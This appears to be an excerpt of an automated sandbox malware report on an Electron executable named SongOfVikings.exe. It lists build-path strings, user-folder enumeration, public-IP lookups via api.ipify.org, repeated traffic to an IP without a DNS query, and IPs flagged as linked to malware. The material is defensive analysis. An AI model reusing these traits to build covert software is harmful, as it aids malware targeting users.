Source:	Binary string: /c /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\INCLUDE\NODE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\SRC" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\CONFIG" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\OPENSSL\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\UV\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\ZLIB" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\V8\INCLUDE" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\NODE_MODULES\NODE-ADDON-API" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\OBJ\GLOBAL_INTERMEDIATE\SQLITE-AUTOCONF-3440200" /Z7 /nologo /W3 /WX- /diagnostics:column /Ox /Ob2 /Oi /Ot /Oy /GL /D NODE_GYP_MODULE_NAME=node_sqlite3 /D USING_UV_SHARED=1 /D USING_V8_SHARED=1 /D V8_DEPRECATION_WARNINGS=1 /D V8_DEPRECATION_WARNINGS /D V8_IMMINENT_DEPRECATION_WARNINGS /D _GLIBCXX_USE_CXX11_ABI=1 /D ELECTRON_ENSURE_CONFIG_GYPI /D WIN32 /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _HAS_EXCEPTIONS=0 /D OPENSSL_NO_PINSHARED /D OPENSSL_THREADS /D NAPI_VERSION=8 /D NAPI_DISABLE_CPP_EXCEPTIONS=1 /D SQLITE_THREADSAFE=1 /D HAVE_USLEEP=1 /D SQLITE_ENABLE_FTS3 /D SQLITE_ENABLE_FTS4 /D SQLITE_ENABLE_FTS5 /D SQLITE_ENABLE_RTREE /D SQLITE_ENABLE_DBSTAT_VTAB=1 /D SQLITE_ENABLE_MATH_FUNCTIONS /D BUILDING_NODE_EXTENSION /D "HOST_BINARY=\"node.exe\"" /D NDEBUG /D _WINDLL /GF /Gm- /EHsc /MT /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Zc:inline /GR- /Fo"RELEASE\OBJ\NODE_SQLITE3\\" /Fd"RELEASE\OBJ\NODE_SQLITE3\VC142.PDB" /external:W3 /Gd /TP /wd4351 /wd4355 /wd4800 /wd4251 /wd4275 /wd4244 /wd4267 /FC /Zc:__cplusplus -std:c++17 C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\NODE-GYP\SRC\WIN_DELAY_LOAD_HOOK.CC source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\serc\Desktop\Telegram - Kopya\x\script\node_modules\sqlite3\build\Release\sqlite3.pdb source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: SQLITE3EXEPDB = /pdb:sqlite3sh.pdb source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ** rbu_file.pDb!=0, then it is assumed to already be present on the source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D3DCompiler_47.pdb source: SongOfVikings.exe, 00000000.00000003.1839026693.00000000051B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: -FdC:\Users\serc\Desktop\Telegram - Kopya\x\script\node_modules\sqlite3\build\Release\sqlite3.pdb source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: -typedil-fC:\Users\serc\Desktop\Telegram - Kopya\x\script\node_modules\node-gyp\src\win_delay_load_hook.cc-dos-Zi-Z7-W3-pdbrpc-Og-Ob2-Ot-EHs-MT-GS-Gy-FitObjFunc-FitObjData-NoRTTI-FoC:\Users\serc\Desktop\Telegram - Kopya\x\script\node_modules\sqlite3\build\deps\Release\obj\sqlite3\win_delay_load_hook.obj-FdC:\Users\serc\Desktop\Telegram - Kopya\x\script\node_modules\sqlite3\build\Release\sqlite3.pdb-errorreport:queue source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\electron.exe.pdb source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D3DCompiler_47.pdbGCTL source: SongOfVikings.exe, 00000000.00000003.1839026693.00000000051B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\ENTERPRISE\VC\TOOLS\MSVC\14.29.30133\LIB\X64\LIBVCRUNTIME.AMD64.PDB source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BCC = $(NCC) -nologo -W4 -Fd$*.pdb $(CCOPTS) $(BCCOPTS) source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: .$ac_ext \| .xcoff \| .tds \| .d \| .pdb \| .xSYM \| .bb \| .bbg \| .map \| .inf \| .dSYM \| .o \| *.obj ) ;; source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: .$ac_ext \| .xcoff \| .tds \| .d \| .pdb \| .xSYM \| .bb \| .bbg \| .map \| .inf \| .dSYM \| .o \| *.obj ) source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\vk_swiftshader.dll.pdb source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1902908317.00000000051B1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /c /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\INCLUDE\NODE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\SRC" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\CONFIG" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\OPENSSL\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\UV\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\ZLIB" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\V8\INCLUDE" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\NODE_MODULES\NODE-ADDON-API" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\OBJ\GLOBAL_INTERMEDIATE\SQLITE-AUTOCONF-3440200" /Z7 /nologo /W3 /WX- /diagnostics:column /Ox /Ob2 /Oi /Ot /Oy /GL /D NODE_GYP_MODULE_NAME=node_sqlite3 /D USING_UV_SHARED=1 /D USING_V8_SHARED=1 /D V8_DEPRECATION_WARNINGS=1 /D V8_DEPRECATION_WARNINGS /D V8_IMMINENT_DEPRECATION_WARNINGS /D _GLIBCXX_USE_CXX11_ABI=1 /D ELECTRON_ENSURE_CONFIG_GYPI /D WIN32 /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _HAS_EXCEPTIONS=0 /D OPENSSL_NO_PINSHARED /D OPENSSL_THREADS /D NAPI_VERSION=8 /D NAPI_DISABLE_CPP_EXCEPTIONS=1 /D SQLITE_THREADSAFE=1 /D HAVE_USLEEP=1 /D SQLITE_ENABLE_FTS3 /D SQLITE_ENABLE_FTS4 /D SQLITE_ENABLE_FTS5 /D SQLITE_ENABLE_RTREE /D SQLITE_ENABLE_DBSTAT_VTAB=1 /D SQLITE_ENABLE_MATH_FUNCTIONS /D BUILDING_NODE_EXTENSION /D "HOST_BINARY=\"node.exe\"" /D NDEBUG /D _WINDLL /GF /Gm- /EHsc /MT /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Zc:inline /GR- /Fo"RELEASE\OBJ\NODE_SQLITE3\\SRC\BACKUP.OBJ" /Fd"RELEASE\OBJ\NODE_SQLITE3\VC142.PDB" /external:W3 /Gd /TP /wd4351 /wd4355 /wd4800 /wd4251 /wd4275 /wd4244 /wd4267 /FC /Zc:__cplusplus -std:c++17 C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\SRC\BACKUP.CC source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /c /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\INCLUDE\NODE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\SRC" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\CONFIG" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\OPENSSL\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\UV\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\ZLIB" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\V8\INCLUDE" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\NODE_MODULES\NODE-ADDON-API" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\OBJ\GLOBAL_INTERMEDIATE\SQLITE-AUTOCONF-3440200" /Z7 /nologo /W3 /WX- /diagnostics:column /Ox /Ob2 /Oi /Ot /Oy /GL /D NODE_GYP_MODULE_NAME=node_sqlite3 /D USING_UV_SHARED=1 /D USING_V8_SHARED=1 /D V8_DEPRECATION_WARNINGS=1 /D V8_DEPRECATION_WARNINGS /D V8_IMMINENT_DEPRECATION_WARNINGS /D _GLIBCXX_USE_CXX11_ABI=1 /D ELECTRON_ENSURE_CONFIG_GYPI /D WIN32 /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _HAS_EXCEPTIONS=0 /D OPENSSL_NO_PINSHARED /D OPENSSL_THREADS /D NAPI_VERSION=8 /D NAPI_DISABLE_CPP_EXCEPTIONS=1 /D SQLITE_THREADSAFE=1 /D HAVE_USLEEP=1 /D SQLITE_ENABLE_FTS3 /D SQLITE_ENABLE_FTS4 /D SQLITE_ENABLE_FTS5 /D SQLITE_ENABLE_RTREE /D SQLITE_ENABLE_DBSTAT_VTAB=1 /D SQLITE_ENABLE_MATH_FUNCTIONS /D BUILDING_NODE_EXTENSION /D "HOST_BINARY=\"node.exe\"" /D NDEBUG /D _WINDLL /GF /Gm- /EHsc /MT /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Zc:inline /GR- /Fo"RELEASE\OBJ\NODE_SQLITE3\\SRC\STATEMENT.OBJ" /Fd"RELEASE\OBJ\NODE_SQLITE3\VC142.PDB" /external:W3 /Gd /TP /wd4351 /wd4355 /wd4800 /wd4251 /wd4275 /wd4244 /wd4267 /FC /Zc:__cplusplus -std:c++17 C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\SRC\STATEMENT.CC source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ** for all file descriptors with rbu_file.pDb!=0. If the argument has source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\ENTERPRISE\VC\TOOLS\MSVC\14.29.30133\LIB\X64\LIBCPMT.AMD64.PDB source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /c /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\INCLUDE\NODE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\SRC" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\CONFIG" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\OPENSSL\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\UV\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\ZLIB" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\V8\INCLUDE" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\NODE_MODULES\NODE-ADDON-API" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\OBJ\GLOBAL_INTERMEDIATE\SQLITE-AUTOCONF-3440200" /Z7 /nologo /W3 /WX- /diagnostics:column /Ox /Ob2 /Oi /Ot /Oy /GL /D NODE_GYP_MODULE_NAME=node_sqlite3 /D USING_UV_SHARED=1 /D USING_V8_SHARED=1 /D V8_DEPRECATION_WARNINGS=1 /D V8_DEPRECATION_WARNINGS /D V8_IMMINENT_DEPRECATION_WARNINGS /D _GLIBCXX_USE_CXX11_ABI=1 /D ELECTRON_ENSURE_CONFIG_GYPI /D WIN32 /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _HAS_EXCEPTIONS=0 /D OPENSSL_NO_PINSHARED /D OPENSSL_THREADS /D NAPI_VERSION=8 /D NAPI_DISABLE_CPP_EXCEPTIONS=1 /D SQLITE_THREADSAFE=1 /D HAVE_USLEEP=1 /D SQLITE_ENABLE_FTS3 /D SQLITE_ENABLE_FTS4 /D SQLITE_ENABLE_FTS5 /D SQLITE_ENABLE_RTREE /D SQLITE_ENABLE_DBSTAT_VTAB=1 /D SQLITE_ENABLE_MATH_FUNCTIONS /D BUILDING_NODE_EXTENSION /D "HOST_BINARY=\"node.exe\"" /D NDEBUG /D _WINDLL /GF /Gm- /EHsc /MT /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Zc:inline /GR- /Fo"RELEASE\OBJ\NODE_SQLITE3\\SRC\DATABASE.OBJ" /Fd"RELEASE\OBJ\NODE_SQLITE3\VC142.PDB" /external:W3 /Gd /TP /wd4351 /wd4355 /wd4800 /wd4251 /wd4275 /wd4244 /wd4267 /FC /Zc:__cplusplus -std:c++17 C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\SRC\DATABASE.CC source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ** rbu_file.pDb!=0. source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\vulkan-1.dll.pdb source: SongOfVikings.exe, 00000000.00000003.1834103716.0000000005A90000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1833977942.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1835988710.0000000005AD0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\SongOfVikings.exe	Code function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004059CC
Source: C:\Users\user\Desktop\SongOfVikings.exe	Code function: 0_2_004065FD FindFirstFileW,FindClose,	0_2_004065FD
Source: C:\Users\user\Desktop\SongOfVikings.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868

Source: C:\Users\user\Desktop\SongOfVikings.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Programs\SongOfVikings	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Programs	Jump to behavior

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 172.64.41.3 172.64.41.3
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

May check the online IP address of the machine

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211

Source: global traffic

HTTP traffic detected: GET /?format=json HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/1.6.8Accept-Encoding: gzip, compress, deflate, brHost: api.ipify.orgConnection: close

Source: unknown

DNS traffic detected: queries for: api.ipify.org

Source: unknown

Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1085
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1452
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1452expandIntegerPowExpressionsThe
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1512
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1637
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1936
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2046
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2152
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2152skipVSConstantRegisterZeroIn
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2162
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2273
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2517
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2894
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2970
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2978
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3027
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3045
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3078
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3205
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3206
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3246
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3246allowClearForRobustResourceInitSome
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3452
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3498
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3502
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3577
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3584
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3586
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3623
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3624
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3625
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3682
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3682allowES3OnFL100Allow
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3729
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3832
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3862
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3965
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3970
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3997
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4214
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4267
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4324
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4384
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4405
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4428
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4551
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4633
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4646
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4722
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/482
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4836
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4901
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4937
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5007
